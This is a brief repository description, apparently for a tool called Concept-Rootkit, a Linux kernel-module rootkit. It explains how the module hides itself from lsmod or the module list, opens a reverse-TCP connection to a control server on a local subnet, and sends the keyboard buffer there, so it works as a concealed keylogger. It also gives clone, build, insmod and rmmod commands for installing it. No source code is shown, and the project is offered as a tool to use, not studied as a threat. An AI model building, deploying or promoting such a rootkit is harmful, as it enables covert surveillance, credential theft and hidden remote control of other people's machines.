Concept-Rootkit - A simple conceptual linux rootkit.

Concept-Rootkit – A simple conceptual linux rootkit.

A simple conceptual linux rootkit.
how it work:
– Hide the module:
+ Option1: Overwrite “lsmod”
+ Option2: Delete module listing “rootkit” from modules.
– Configure rootkit to be a client.
+ Will connect to the control-server on the 192.168.1.0/24 subnet.
+ This connection is, thus, a reverse-TCP connection.

Rootkit dot ko listeners

Rootkit dot ko listeners

with function:
– Send keyboard buffer to control server.
– Add network-listening functionality.
– Filter out “ACK” numbers from TCP packets.

Usage:
* START: $> insmod rootkit.ko
* STOP : $> rmmod rootkit

Installation :
git clone https://github.com/AIPSec/Concept-Rootkit
cd Concept-Rootkit/src
make

Source :https://github.com/AIPSec